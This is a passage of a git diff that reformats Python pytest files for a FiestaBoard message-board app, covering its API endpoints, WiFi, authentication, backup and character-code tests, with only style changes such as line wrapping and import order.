             response = client.post("/plugins/weather/disable")
         assert response.status_code == 200
         assert response.json()["enabled"] is False
@@ -809,9 +823,11 @@ class TestPluginEndpoints:
             response = client.post("/plugins/weather/receive", json={"message": "hello"})
         assert response.status_code == 503
 
+
 # ============================================================
 # Template Endpoints
 # ============================================================
+
 
 class TestTemplateEndpoints:
     def test_get_template_variables(self, client, mock_template_engine):
@@ -894,9 +910,12 @@ class TestTemplateEndpoints:
             mock_board_client = Mock()
             mock_board_client.send_characters.return_value = (True, True)
             mock_bcfbd.return_value = mock_board_client
-            response = client.post("/templates/render/live", json={
-                "template": "Hello World",
-            })
+            response = client.post(
+                "/templates/render/live",
+                json={
+                    "template": "Hello World",
+                },
+            )
         assert response.status_code == 200
         data = response.json()
         assert "rendered" in data
@@ -921,18 +940,26 @@ class TestTemplateEndpoints:
     def test_render_template_live_board_not_found(self, client, mock_template_engine, mock_settings_service):
         mock_settings_service.get_board_settings.return_value = Mock(boards=[{"id": "b1", "device_type": "flagship"}])
         with patch("src.api_server.board_client_from_board_dict", return_value=None):
-            response = client.post("/templates/render/live", json={
-                "template": "Hello",
-                "board_id": "b1",
-            })
+            response = client.post(
+                "/templates/render/live",
+                json={
+                    "template": "Hello",
+                    "board_id": "b1",
+                },
+            )
         assert response.status_code == 200
 
-    def test_render_template_live_specified_board_id_not_found(self, client, mock_template_engine, mock_settings_service):
+    def test_render_template_live_specified_board_id_not_found(
+        self, client, mock_template_engine, mock_settings_service
+    ):
         mock_settings_service.get_board_settings.return_value = Mock(boards=[])
-        response = client.post("/templates/render/live", json={
-            "template": "Hello",
-            "board_id": "nonexistent",
-        })
+        response = client.post(
+            "/templates/render/live",
+            json={
+                "template": "Hello",
+                "board_id": "nonexistent",
+            },
+        )
         assert response.status_code == 404
 
     def test_render_template_live_render_error(self, client, mock_template_engine, mock_settings_service):
@@ -945,6 +972,7 @@ class TestTemplateEndpoints:
 # Pages Endpoints
 # ============================================================
 
+
 class TestPagesEndpoints:
     def test_list_pages(self, client, mock_page_service):
         response = client.get("/pages")
@@ -954,11 +982,14 @@ class TestPagesEndpoints:
         assert data["total"] == 1
 
     def test_create_page(self, client, mock_page_service):
-        response = client.post("/pages", json={
-            "name": "Test Page",
-            "type": "template",
-            "template": ["Hello"],
-        })
+        response = client.post(
+            "/pages",
+            json={
+                "name": "Test Page",
+                "type": "template",
+                "template": ["Hello"],
+            },
+        )
         assert response.status_code == 200
         assert response.json()["status"] == "success"
 
@@ -1032,9 +1063,12 @@ class TestPagesEndpoints:
         assert response.status_code == 503
 
     def test_preview_pages_batch(self, client, mock_page_service, mock_settings_service):
-        response = client.post("/pages/preview/batch", json={
-            "page_ids": ["page1"],
-        })
+        response = client.post(
+            "/pages/preview/batch",
+            json={
+                "page_ids": ["page1"],
+            },
+        )
         assert response.status_code == 200
         data = response.json()
         assert "previews" in data
@@ -1105,6 +1139,7 @@ class TestPagesEndpoints:
 # ============================================================
 # Schedule Endpoints
 # ============================================================
+
 
 class TestScheduleEndpoints:
     def test_list_schedules(self, client, mock_schedule_service, mock_settings_service):
@@ -1207,6 +1242,7 @@ class TestScheduleEndpoints:
 # Cache / Force Refresh
 # ============================================================
 
+
 class TestCacheEndpoints:
     def test_get_cache_status(self, client, mock_service):
         response = client.get("/cache-status")
@@ -1252,6 +1288,7 @@ class TestCacheEndpoints:
 # ============================================================
 # Service Start / Stop / Refresh / Send Message
 # ============================================================
+
 
 class TestServiceLifecycle:
     def test_start_already_running(self, client, mock_service):
@@ -1323,6 +1360,7 @@ class TestServiceLifecycle:
 # Board Current Message
 # ============================================================
 
+
 class TestBoardCurrentMessage:
     def test_no_service(self, client):
         with patch("src.api_server.get_service", return_value=None):
@@ -1359,6 +1397,7 @@ class TestBoardCurrentMessage:
     def test_success_cached(self, client, mock_service):
         """When polled cache is populated, serves from it without calling read_current_message."""
         import time
+
         grid = [[0] * 22 for _ in range(6)]
         grid[0][0:3] = [8, 9, 10]
         mock_service._polled_characters = grid
@@ -1373,6 +1412,7 @@ class TestBoardCurrentMessage:
     def test_force_bypasses_cache(self, client, mock_service):
         """?force=true makes a live call even when cache is populated."""
         import time
+
         cached_grid = [[1] * 22 for _ in range(6)]
         fresh_grid = [[2] * 22 for _ in range(6)]
         mock_service._polled_characters = cached_grid
@@ -1406,8 +1446,8 @@ class TestBoardCurrentMessage:
 
     def test_color_tiles_in_message(self, client, mock_service):
         grid = [[0] * 22 for _ in range(6)]
-        grid[0][0] = 63   # RED tile
-        grid[0][1] = 64   # ORANGE tile
+        grid[0][0] = 63  # RED tile
+        grid[0][1] = 64  # ORANGE tile
         mock_service.vb_client.read_current_message.return_value = grid
         response = client.get("/board/current-message")
         assert response.status_code == 200
@@ -1421,6 +1461,7 @@ class TestCharactersToMessage:
 
     def _call(self, grid):
         from src.api_server import _characters_to_message
+
         return _characters_to_message(grid)
 
     def test_blank_board(self):
@@ -1469,11 +1510,15 @@ class TestCharactersToMessage:
 # Display Batch Operations
 # ============================================================
 
+
 class TestDisplayBatchEndpoints:
     def test_displays_raw_batch(self, client, mock_display_service):
-        response = client.post("/displays/raw/batch", json={
-            "display_types": ["weather"],
-        })
+        response = client.post(
+            "/displays/raw/batch",
+            json={
+                "display_types": ["weather"],
+            },
+        )
         assert response.status_code == 200
         data = response.json()
         assert "displays" in data
@@ -1489,9 +1534,12 @@ class TestDisplayBatchEndpoints:
 
     def test_displays_raw_batch_exception_handling(self, client, mock_display_service):
         mock_display_service.get_display.side_effect = Exception("Plugin error")
-        response = client.post("/displays/raw/batch", json={
-            "display_types": ["weather"],
-        })
+        response = client.post(
+            "/displays/raw/batch",
+            json={
+                "display_types": ["weather"],
+            },
+        )
         assert response.status_code == 200
         data = response.json()
         assert data["displays"]["weather"]["available"] is False
@@ -1507,6 +1555,7 @@ class TestDisplayBatchEndpoints:
 
     def test_send_display_unknown_type(self, client, mock_display_service, mock_settings_service, mock_service):
         from src.displays.service import DisplayResult
+
         mock_display_service.get_display.return_value = DisplayResult(
             display_type="fake",
             formatted="",
@@ -1522,6 +1571,7 @@ class TestDisplayBatchEndpoints:
 # Welcome Message
 # ============================================================
 
+
 class TestWelcomeMessage:
     def test_send_welcome_silence_mode(self, client):
         with patch("src.api_server.Config.is_silence_mode_active", return_value=True):
@@ -1529,24 +1579,32 @@ class TestWelcomeMessage:
         assert response.status_code == 200
         assert response.json()["silence_mode"] is True
 
+
 # ============================================================
 # Enable Local API
 # ============================================================
 
+
 class TestEnableLocalAPI:
     def test_missing_host(self, client):
-        response = client.post("/config/board/enable-local-api", json={
-            "host": "",
-            "enablement_token": "test_token_xyz",
-        })
+        response = client.post(
+            "/config/board/enable-local-api",
+            json={
+                "host": "",
+                "enablement_token": "test_token_xyz",
+            },
+        )
         assert response.status_code == 200
         assert response.json()["success"] is False
 
     def test_missing_token(self, client):
-        response = client.post("/config/board/enable-local-api", json={
-            "host": "192.168.1.100",
-            "enablement_token": "",
-        })
+        response = client.post(
+            "/config/board/enable-local-api",
+            json={
+                "host": "192.168.1.100",
+                "enablement_token": "",
+            },
+        )
         assert response.status_code == 200
         assert response.json()["success"] is False
 
@@ -1554,11 +1612,14 @@ class TestEnableLocalAPI:
         mock_resp = Mock()
         mock_resp.status_code = 200
         mock_resp.json.return_value = {"apiKey": "generated_api_key_abc"}
-        with patch("src.api_server.requests.post", return_value=mock_resp) as mock_post:
-            response = client.post("/config/board/enable-local-api", json={
-                "host": "192.168.1.100",
-                "enablement_token": "test_enablement_token_xyz",
-            })
+        with patch("src.api_server.requests.post", return_value=mock_resp):
+            response = client.post(
+                "/config/board/enable-local-api",
+                json={
+                    "host": "192.168.1.100",
+                    "enablement_token": "test_enablement_token_xyz",
+                },
+            )
         assert response.status_code == 200
         data = response.json()
         assert data["success"] is True
@@ -1569,10 +1630,13 @@ class TestEnableLocalAPI:
         mock_resp.status_code = 200
         mock_resp.json.return_value = {}
         with patch("src.api_server.requests.post", return_value=mock_resp):
-            response = client.post("/config/board/enable-local-api", json={
-                "host": "192.168.1.100",
-                "enablement_token": "test_token_xyz",
-            })
+            response = client.post(
+                "/config/board/enable-local-api",
+                json={
+                    "host": "192.168.1.100",
+                    "enablement_token": "test_token_xyz",
+                },
+            )
         assert response.status_code == 200
         assert response.json()["success"] is False
 
@@ -1581,10 +1645,13 @@ class TestEnableLocalAPI:
         mock_resp.status_code = 401
         mock_resp.text = "Unauthorized"
         with patch("src.api_server.requests.post", return_value=mock_resp):
-            response = client.post("/config/board/enable-local-api", json={
-                "host": "192.168.1.100",
-                "enablement_token": "test_bad_token",
-            })
+            response = client.post(
+                "/config/board/enable-local-api",
+                json={
+                    "host": "192.168.1.100",
+                    "enablement_token": "test_bad_token",
+                },
+            )
         assert response.status_code == 200
         assert response.json()["success"] is False
 
@@ -1593,41 +1660,53 @@ class TestEnableLocalAPI:
         mock_resp.status_code = 500
         mock_resp.text = "Internal Server Error"
         with patch("src.api_server.requests.post", return_value=mock_resp):
-            response = client.post("/config/board/enable-local-api", json={
-                "host": "192.168.1.100",
-                "enablement_token": "test_token_xyz",
-            })
+            response = client.post(
+                "/config/board/enable-local-api",
+                json={
+                    "host": "192.168.1.100",
+                    "enablement_token": "test_token_xyz",
+                },
+            )
         assert response.status_code == 200
         assert response.json()["success"] is False
 
     def test_connection_error(self, client):
         import requests as http_requests
-        with patch("src.api_server.requests.post",
-                    side_effect=http_requests.exceptions.ConnectionError("refused")):
-            response = client.post("/config/board/enable-local-api", json={
-                "host": "192.168.1.100",
-                "enablement_token": "test_token_xyz",
-            })
+
+        with patch("src.api_server.requests.post", side_effect=http_requests.exceptions.ConnectionError("refused")):
+            response = client.post(
+                "/config/board/enable-local-api",
+                json={
+                    "host": "192.168.1.100",
+                    "enablement_token": "test_token_xyz",
+                },
+            )
         assert response.status_code == 200
         assert response.json()["success"] is False
 
     def test_timeout_error(self, client):
         import requests as http_requests
-        with patch("src.api_server.requests.post",
-                    side_effect=http_requests.exceptions.Timeout("timed out")):
-            response = client.post("/config/board/enable-local-api", json={
-                "host": "192.168.1.100",
-                "enablement_token": "test_token_xyz",
-            })
+
+        with patch("src.api_server.requests.post", side_effect=http_requests.exceptions.Timeout("timed out")):
+            response = client.post(
+                "/config/board/enable-local-api",
+                json={
+                    "host": "192.168.1.100",
+                    "enablement_token": "test_token_xyz",
+                },
+            )
         assert response.status_code == 200
         assert response.json()["success"] is False
 
     def test_generic_error(self, client):
         with patch("src.api_server.requests.post", side_effect=RuntimeError("unexpected")):
-            response = client.post("/config/board/enable-local-api", json={
-                "host": "192.168.1.100",
-                "enablement_token": "test_token_xyz",
-            })
+            response = client.post(
+                "/config/board/enable-local-api",
+                json={
+                    "host": "192.168.1.100",
+                    "enablement_token": "test_token_xyz",
+                },
+            )
         assert response.status_code == 200
         assert response.json()["success"] is False
 
@@ -1635,6 +1714,7 @@ class TestEnableLocalAPI:
 # ============================================================
 # Stocks Endpoints
 # ============================================================
+
 
 class TestStocksEndpoints:
     def test_validate_stock_missing_symbol(self, client):
@@ -1645,6 +1725,7 @@ class TestStocksEndpoints:
 # ============================================================
 # Traffic Geocode
 # ============================================================
+
 
 class TestTrafficGeocode:
     def test_geocode_success(self, client):
@@ -1676,6 +1757,7 @@ class TestTrafficGeocode:
 # Queue Times Proxy
 # ============================================================
 
+
 class TestQueueTimes:
     def test_list_disney_parks(self, client):
         with patch("src.api_server._queue_times_get") as mock_qt:
@@ -1699,9 +1781,7 @@ class TestQueueTimes:
 
     def test_list_park_rides(self, client):
         with patch("src.api_server._queue_times_get") as mock_qt:
-            mock_qt.return_value = {
-                "lands": [{"rides": [{"id": 1, "name": "Space Mountain"}]}]
-            }
+            mock_qt.return_value = {"lands": [{"rides": [{"id": 1, "name": "Space Mountain"}]}]}
             response = client.get("/queue-times/parks/1/rides")
         assert response.status_code == 200
 
@@ -1709,4 +1789,3 @@ class TestQueueTimes:
         with patch("src.api_server._queue_times_get", side_effect=Exception("fail")):
             response = client.get("/queue-times/parks/1/rides")
         assert response.status_code == 502
-

--- a/tests/test_api_wifi.py
+++ b/tests/test_api_wifi.py
@@ -8,7 +8,6 @@ import pytest
 from fastapi.testclient import TestClient
 
 from src.api_server import app
-from src.network import wifi as wifi_module
 from src.network.wifi import (
     SavedNetwork,
     WiFiCapability,
@@ -54,6 +53,7 @@ def force_unavailable():
 # capability
 # ---------------------------------------------------------------------------
 
+
 def test_capability_returns_unavailable_off_pi(client, force_unavailable):
     resp = client.get("/network/wifi/capability")
     assert resp.status_code == 200
@@ -71,6 +71,7 @@ def test_capability_returns_available_on_pi(client, force_available):
 # ---------------------------------------------------------------------------
 # Endpoints return 501 when unavailable
 # ---------------------------------------------------------------------------
+
 
 @pytest.mark.parametrize(
     "method,path",
@@ -99,6 +100,7 @@ def test_connect_returns_501_when_unavailable(client, force_unavailable):
 # ---------------------------------------------------------------------------
 # status
 # ---------------------------------------------------------------------------
+
 
 def test_status_returns_current_state(client, force_available):
     svc = get_wifi_service()
@@ -131,6 +133,7 @@ def test_status_translates_wifi_error_to_400(client, force_available):
 # scan
 # ---------------------------------------------------------------------------
 
+
 def test_scan_returns_networks(client, force_available):
     svc = get_wifi_service()
     fake = [
@@ -149,6 +152,7 @@ def test_scan_returns_networks(client, force_available):
 # ---------------------------------------------------------------------------
 # saved + forget
 # ---------------------------------------------------------------------------
+
 
 def test_saved_returns_profiles(client, force_available):
     svc = get_wifi_service()
@@ -175,6 +179,7 @@ def test_forget_deletes_profile(client, force_available):
 # ---------------------------------------------------------------------------
 # connect + disconnect
 # ---------------------------------------------------------------------------
+
 
 def test_connect_returns_status_and_confirmation(client, force_available):
     svc = get_wifi_service()

--- a/tests/test_auth_mcp_token_routes.py
+++ b/tests/test_auth_mcp_token_routes.py
@@ -192,10 +192,7 @@ def test_rotate_accessible_when_auth_disabled(client, auth_disabled):
         "source": "stored",
     }
     bare = TestClient(app, raise_server_exceptions=False)
-    assert (
-        bare.get("/mcp/", headers={"Authorization": f"Bearer {token}"}).status_code
-        != 401
-    )
+    assert bare.get("/mcp/", headers={"Authorization": f"Bearer {token}"}).status_code != 401
 
 
 def test_clear_accessible_when_auth_disabled(client, auth_disabled):

--- a/tests/test_auth_routes.py
+++ b/tests/test_auth_routes.py
@@ -14,8 +14,8 @@ import pytest
 from fastapi.testclient import TestClient
 
 from src.api_server import app
-from src.auth import service as auth_service
 from src.auth import routes as auth_routes
+from src.auth import service as auth_service
 
 
 @pytest.fixture
@@ -194,9 +194,7 @@ def test_login_remember_me_defaults_to_session_cookie(client, enabled):
     """Omitting the field behaves like remember_me=False for API clients."""
     client.post("/auth/setup", json={"username": "admin", "password": "supersecret"})
     client.cookies.clear()
-    r = client.post(
-        "/auth/login", json={"username": "admin", "password": "supersecret"}
-    )
+    r = client.post("/auth/login", json={"username": "admin", "password": "supersecret"})
     assert r.status_code == 200
     cookie = _session_set_cookie(r)
     assert "Max-Age" not in cookie
@@ -228,9 +226,7 @@ def test_change_password_flow(client, enabled):
     assert r.status_code == 200
     # Log out, log back in with new password.
     client.post("/auth/logout")
-    r2 = client.post(
-        "/auth/login", json={"username": "admin", "password": "brandnewpassword"}
-    )
+    r2 = client.post("/auth/login", json={"username": "admin", "password": "brandnewpassword"})
     assert r2.status_code == 200
 
 
@@ -405,9 +401,7 @@ def test_disable_auth_happy_path(client, enabled, monkeypatch):
     # Clear the env-var pin so set_auth_preference("disabled") actually
     # takes effect for the next /auth/status call.
     monkeypatch.delenv("FIESTABOARD_AUTH_ENABLED", raising=False)
-    r = client.post(
-        "/auth/disable", json={"current_password": "supersecret"}
-    )
+    r = client.post("/auth/disable", json={"current_password": "supersecret"})
     assert r.status_code == 200, r.text
     # The session cookie was cleared and the user record removed.
     status_body = client.get("/auth/status").json()
@@ -440,8 +434,6 @@ def test_disable_auth_blocked_when_env_pinned(client, enabled):
     """The env var always wins — UI can't override an ops-pinned mode."""
     client.post("/auth/setup", json={"username": "admin", "password": "supersecret"})
     # `enabled` fixture sets FIESTABOARD_AUTH_ENABLED=true and leaves it set.
-    r = client.post(
-        "/auth/disable", json={"current_password": "supersecret"}
-    )
+    r = client.post("/auth/disable", json={"current_password": "supersecret"})
     assert r.status_code == 409
     assert "FIESTABOARD_AUTH_ENABLED" in r.json()["detail"]

--- a/tests/test_auth_service.py
+++ b/tests/test_auth_service.py
@@ -227,9 +227,7 @@ def test_auth_file_perms(tmp_path):
 def test_is_auth_enabled(monkeypatch, tmp_path):
     """The env var pins the mode regardless of stored preference."""
     # Isolate the singleton + stored preference from any leftover state.
-    monkeypatch.setattr(auth_service, "_service", auth_service.AuthService(
-        auth_file=tmp_path / "auth.json"
-    ))
+    monkeypatch.setattr(auth_service, "_service", auth_service.AuthService(auth_file=tmp_path / "auth.json"))
 
     # Truthy env var -> always enabled.
     for v in ("true", "True", "1", "yes", "on"):

--- a/tests/test_backup.py
+++ b/tests/test_backup.py
@@ -14,7 +14,6 @@ from src.backup.service import (
     BackupService,
 )
 
-
 # ── unit tests for BackupService ────────────────────────────────────────────
 
 
@@ -30,9 +29,7 @@ def _seed_data_dir(data_dir: Path) -> None:
             }
         )
     )
-    (data_dir / "settings.json").write_text(
-        json.dumps({"transitions": {"strategy": "column"}})
-    )
+    (data_dir / "settings.json").write_text(json.dumps({"transitions": {"strategy": "column"}}))
     (data_dir / "pages.json").write_text(
         json.dumps(
             {
@@ -42,9 +39,7 @@ def _seed_data_dir(data_dir: Path) -> None:
         )
     )
     (data_dir / "carousels.json").write_text(json.dumps({"carousels": []}))
-    (data_dir / "schedules.json").write_text(
-        json.dumps({"schedules": [], "default_page_id": None})
-    )
+    (data_dir / "schedules.json").write_text(json.dumps({"schedules": [], "default_page_id": None}))
 
 
 def test_build_backup_includes_all_data_files(tmp_path):
@@ -95,9 +90,7 @@ def test_round_trip_export_then_import(tmp_path):
     backup = BackupService(data_dir=src_dir).build_backup()
 
     with patch("src.backup.service._reload_services", return_value=[]):
-        result = BackupService(data_dir=dst_dir).import_from_dict(
-            backup, reinstall_plugins=False
-        )
+        result = BackupService(data_dir=dst_dir).import_from_dict(backup, reinstall_plugins=False)
 
     assert result["status"] == "success"
     assert set(result["restored_files"]) == {
@@ -108,10 +101,7 @@ def test_round_trip_export_then_import(tmp_path):
         "schedules.json",
     }
     # Data was actually written to the destination.
-    assert (
-        json.loads((dst_dir / "config.json").read_text())["board"]["host"]
-        == "fiestaboard.example.test"
-    )
+    assert json.loads((dst_dir / "config.json").read_text())["board"]["host"] == "fiestaboard.example.test"
     assert json.loads((dst_dir / "pages.json").read_text())["pages"][0]["id"] == "p1"
 
 
@@ -128,9 +118,7 @@ def test_import_preserves_existing_files_as_pre_restore_backup(tmp_path):
     }
 
     with patch("src.backup.service._reload_services", return_value=[]):
-        result = BackupService(data_dir=tmp_path).import_from_dict(
-            backup, reinstall_plugins=False
-        )
+        result = BackupService(data_dir=tmp_path).import_from_dict(backup, reinstall_plugins=False)
 
     assert json.loads((tmp_path / "config.json").read_text()) == {"marker": "NEW"}
 
@@ -150,9 +138,7 @@ def test_import_skips_missing_data_keys(tmp_path):
     }
 
     with patch("src.backup.service._reload_services", return_value=[]):
-        result = BackupService(data_dir=tmp_path).import_from_dict(
-            backup, reinstall_plugins=False
-        )
+        result = BackupService(data_dir=tmp_path).import_from_dict(backup, reinstall_plugins=False)
 
     assert "config.json" in result["restored_files"]
     # All other keys absent from the backup should be reported as skipped.
@@ -205,9 +191,7 @@ def test_collect_installed_plugins_skips_builtins(tmp_path):
     )
     fake_registry = MagicMock(_loader=fake_loader)
 
-    with patch(
-        "src.plugins.get_plugin_registry", return_value=fake_registry, create=True
-    ):
+    with patch("src.plugins.get_plugin_registry", return_value=fake_registry, create=True):
         plugins = BackupService._collect_installed_plugins()
 
     assert len(plugins) == 1
@@ -221,9 +205,7 @@ def test_reinstall_plugins_skips_already_installed(tmp_path):
     fake_registry.get_plugin.return_value = object()  # already installed
     fake_registry.install_from_registry.return_value = []
 
-    with patch(
-        "src.plugins.get_plugin_registry", return_value=fake_registry, create=True
-    ):
+    with patch("src.plugins.get_plugin_registry", return_value=fake_registry, create=True):
         result = BackupService._reinstall_plugins(
             [
                 {
@@ -245,9 +227,7 @@ def test_reinstall_plugins_records_failures(tmp_path):
     fake_registry.get_plugin.return_value = None
     fake_registry.install_from_registry.return_value = ["clone failed"]
 
-    with patch(
-        "src.plugins.get_plugin_registry", return_value=fake_registry, create=True
-    ):
+    with patch("src.plugins.get_plugin_registry", return_value=fake_registry, create=True):
         result = BackupService._reinstall_plugins(
             [
                 {
@@ -269,9 +249,7 @@ def test_reinstall_plugins_installs_registry_plugin(tmp_path):
     fake_registry.get_plugin.return_value = None  # not yet installed
     fake_registry.install_from_registry.return_value = []  # success — no errors
 
-    with patch(
-        "src.plugins.get_plugin_registry", return_value=fake_registry, create=True
-    ):
+    with patch("src.plugins.get_plugin_registry", return_value=fake_registry, create=True):
         result = BackupService._reinstall_plugins(
             [
                 {
@@ -295,9 +273,7 @@ def test_reinstall_plugins_rejects_malicious_plugin_id(tmp_path):
     fake_registry = MagicMock()
     fake_registry.get_plugin.return_value = None
 
-    with patch(
-        "src.plugins.get_plugin_registry", return_value=fake_registry, create=True
-    ):
+    with patch("src.plugins.get_plugin_registry", return_value=fake_registry, create=True):
         result = BackupService._reinstall_plugins(
             [
                 {
@@ -324,9 +300,7 @@ def test_reinstall_plugins_skips_external_git_plugins(tmp_path):
     fake_registry = MagicMock()
     fake_registry.get_plugin.return_value = None
 
-    with patch(
-        "src.plugins.get_plugin_registry", return_value=fake_registry, create=True
-    ):
+    with patch("src.plugins.get_plugin_registry", return_value=fake_registry, create=True):
         result = BackupService._reinstall_plugins(
             [
                 {
@@ -398,26 +372,19 @@ def test_import_endpoint_round_trip(client_with_data_dir):
     # Mutate a value in the backup so we can confirm import wrote it.
     backup["data"]["config"]["board"]["host"] = "new-host.example.test"
 
-    response = client.post(
-        "/backup/import?reinstall_plugins=false", json=backup
-    )
+    response = client.post("/backup/import?reinstall_plugins=false", json=backup)
 
     assert response.status_code == 200, response.text
     body = response.json()
     assert body["status"] == "success"
     assert "config.json" in body["restored_files"]
-    assert (
-        json.loads((data_dir / "config.json").read_text())["board"]["host"]
-        == "new-host.example.test"
-    )
+    assert json.loads((data_dir / "config.json").read_text())["board"]["host"] == "new-host.example.test"
 
 
 def test_import_endpoint_rejects_invalid_payload(client_with_data_dir):
     client, _ = client_with_data_dir
 
-    response = client.post(
-        "/backup/import", json={"definitely": "not a backup"}
-    )
+    response = client.post("/backup/import", json={"definitely": "not a backup"})
 
     assert response.status_code == 400
     assert "marker" in response.json()["detail"].lower()

--- a/tests/test_board_chars.py
+++ b/tests/test_board_chars.py
@@ -3,9 +3,9 @@
 import pytest
 
 from src.board_chars import (
+    WEATHER_SYMBOLS,
     BoardChars,
     FiestaboardChars,
-    WEATHER_SYMBOLS,
     get_weather_symbol,
 )
 
@@ -13,14 +13,37 @@ from src.board_chars import (
 class TestBoardCharsLetterCodes:
     """Tests for letter codes A-Z (codes 1-26)."""
 
-    @pytest.mark.parametrize("char,expected", [
-        ("A", 1), ("B", 2), ("C", 3), ("D", 4), ("E", 5),
-        ("F", 6), ("G", 7), ("H", 8), ("I", 9), ("J", 10),
-        ("K", 11), ("L", 12), ("M", 13), ("N", 14), ("O", 15),
-        ("P", 16), ("Q", 17), ("R", 18), ("S", 19), ("T", 20),
-        ("U", 21), ("V", 22), ("W", 23), ("X", 24), ("Y", 25),
-        ("Z", 26),
-    ])
+    @pytest.mark.parametrize(
+        "char,expected",
+        [
+            ("A", 1),
+            ("B", 2),
+            ("C", 3),
+            ("D", 4),
+            ("E", 5),
+            ("F", 6),
+            ("G", 7),
+            ("H", 8),
+            ("I", 9),
+            ("J", 10),
+            ("K", 11),
+            ("L", 12),
+            ("M", 13),
+            ("N", 14),
+            ("O", 15),
+            ("P", 16),
+            ("Q", 17),
+            ("R", 18),
+            ("S", 19),
+            ("T", 20),
+            ("U", 21),
+            ("V", 22),
+            ("W", 23),
+            ("X", 24),
+            ("Y", 25),
+            ("Z", 26),
+        ],
+    )
     def test_uppercase_letters(self, char, expected):
         """All uppercase letters map to codes 1-26."""
         assert BoardChars.get_char_code(char) == expected
@@ -34,10 +57,21 @@ class TestBoardCharsLetterCodes:
 class TestBoardCharsNumberCodes:
     """Tests for number codes (1-9 = 27-35, 0 = 36)."""
 
-    @pytest.mark.parametrize("char,expected", [
-        ("1", 27), ("2", 28), ("3", 29), ("4", 30), ("5", 31),
-        ("6", 32), ("7", 33), ("8", 34), ("9", 35), ("0", 36),
-    ])
+    @pytest.mark.parametrize(
+        "char,expected",
+        [
+            ("1", 27),
+            ("2", 28),
+            ("3", 29),
+            ("4", 30),
+            ("5", 31),
+            ("6", 32),
+            ("7", 33),
+            ("8", 34),
+            ("9", 35),
+            ("0", 36),
+        ],
+    )
     def test_number_codes(self, char, expected):
         """Numbers 1-9 map to 27-35, 0 maps to 36."""
         assert BoardChars.get_char_code(char) == expected
@@ -46,31 +80,34 @@ class TestBoardCharsNumberCodes:
 class TestBoardCharsSpecialCharacters:
     """Tests for special character codes."""
 
-    @pytest.mark.parametrize("char,expected", [
-        (" ", BoardChars.SPACE),
-        ("!", BoardChars.EXCLAMATION),
-        ("@", BoardChars.AT),
-        ("#", BoardChars.POUND),
-        ("$", BoardChars.DOLLAR),
-        ("(", BoardChars.LEFT_PAREN),
-        (")", BoardChars.RIGHT_PAREN),
-        ("-", BoardChars.DASH),
-        ("+", BoardChars.PLUS),
-        ("&", BoardChars.AMPERSAND),
-        ("=", BoardChars.EQUALS),
-        (";", BoardChars.SEMICOLON),
-        (":", BoardChars.COLON),
-        ("'", BoardChars.SINGLE_QUOTE),
-        ('"', BoardChars.DOUBLE_QUOTE),
-        ("%", BoardChars.PERCENT),
-        (",", BoardChars.COMMA),
-        (".", BoardChars.PERIOD),
-        ("/", BoardChars.SLASH),
-        ("?", BoardChars.QUESTION),
-        ("°", BoardChars.DEGREE),
-        ("❤", BoardChars.DEGREE),
-        ("♥", BoardChars.DEGREE),
-    ])
+    @pytest.mark.parametrize(
+        "char,expected",
+        [
+            (" ", BoardChars.SPACE),
+            ("!", BoardChars.EXCLAMATION),
+            ("@", BoardChars.AT),
+            ("#", BoardChars.POUND),
+            ("$", BoardChars.DOLLAR),
+            ("(", BoardChars.LEFT_PAREN),
+            (")", BoardChars.RIGHT_PAREN),
+            ("-", BoardChars.DASH),
+            ("+", BoardChars.PLUS),
+            ("&", BoardChars.AMPERSAND),
+            ("=", BoardChars.EQUALS),
+            (";", BoardChars.SEMICOLON),
+            (":", BoardChars.COLON),
+            ("'", BoardChars.SINGLE_QUOTE),
+            ('"', BoardChars.DOUBLE_QUOTE),
+            ("%", BoardChars.PERCENT),
+            (",", BoardChars.COMMA),
+            (".", BoardChars.PERIOD),
+            ("/", BoardChars.SLASH),
+            ("?", BoardChars.QUESTION),
+            ("°", BoardChars.DEGREE),
+            ("❤", BoardChars.DEGREE),
+            ("♥", BoardChars.DEGREE),
+        ],
+    )
     def test_special_char_codes(self, char, expected):
         """Special characters map to correct codes."""
         assert BoardChars.get_char_code(char) == expected
@@ -95,18 +132,21 @@ class TestBoardCharsUnknownCharacter:
 class TestBoardCharsColorCodes:
     """Tests for color code lookups."""
 
-    @pytest.mark.parametrize("color_name,expected", [
-        ("red", BoardChars.RED),
-        ("orange", BoardChars.ORANGE),
-        ("yellow", BoardChars.YELLOW),
-        ("green", BoardChars.GREEN),
-        ("blue", BoardChars.BLUE),
-        ("violet", BoardChars.VIOLET),
-        ("purple", BoardChars.VIOLET),
-        ("white", BoardChars.WHITE),
-        ("black", BoardChars.BLACK),
-        ("filled", BoardChars.FILLED),
-    ])
+    @pytest.mark.parametrize(
+        "color_name,expected",
+        [
+            ("red", BoardChars.RED),
+            ("orange", BoardChars.ORANGE),
+            ("yellow", BoardChars.YELLOW),
+            ("green", BoardChars.GREEN),
+            ("blue", BoardChars.BLUE),
+            ("violet", BoardChars.VIOLET),
+            ("purple", BoardChars.VIOLET),
+            ("white", BoardChars.WHITE),
+            ("black", BoardChars.BLACK),
+            ("filled", BoardChars.FILLED),
+        ],
+    )
     def test_color_code_lookups(self, color_name, expected):
         """All color names map to correct codes."""
         assert BoardChars.get_color_code(color_name) == expected
@@ -227,9 +267,21 @@ class TestWeatherSymbols:
     def test_weather_symbols_dict_keys(self):
         """WEATHER_SYMBOLS has expected keys."""
         expected_conditions = [
-            "Clear", "Sunny", "Partly Cloudy", "Cloudy", "Overcast",
-            "Rain", "Rainy", "Light Rain", "Heavy Rain",
-            "Thunderstorm", "Storm", "Snow", "Snowy", "Fog", "Mist",
+            "Clear",
+            "Sunny",
+            "Partly Cloudy",
+            "Cloudy",
+            "Overcast",
+            "Rain",
+            "Rainy",
+            "Light Rain",
+            "Heavy Rain",
+            "Thunderstorm",
+            "Storm",
+            "Snow",
+            "Snowy",
+            "Fog",
+            "Mist",
         ]
         for cond in expected_conditions:
             assert cond in WEATHER_SYMBOLS

--- a/tests/test_board_client.py
+++ b/tests/test_board_client.py
@@ -205,7 +205,7 @@ class TestSendCharacters:
 
         for strategy in VALID_STRATEGIES:
             client.clear_cache()  # Clear cache between tests
-            success, was_sent = client.send_characters(valid_grid, strategy=strategy)
+            success, _was_sent = client.send_characters(valid_grid, strategy=strategy)
             assert success is True, f"Strategy {strategy} failed"
 
     def test_send_characters_invalid_strategy(self, client, valid_grid):

--- a/tests/test_board_client.py
+++ b/tests/test_board_client.py
@@ -1,14 +1,14 @@
 """Tests for Board Local API client."""
 
 import json
+from unittest.mock import Mock, patch
 
 import pytest
-from unittest.mock import Mock, patch
 import requests
 
 from src.board_client import (
-    BoardClient,
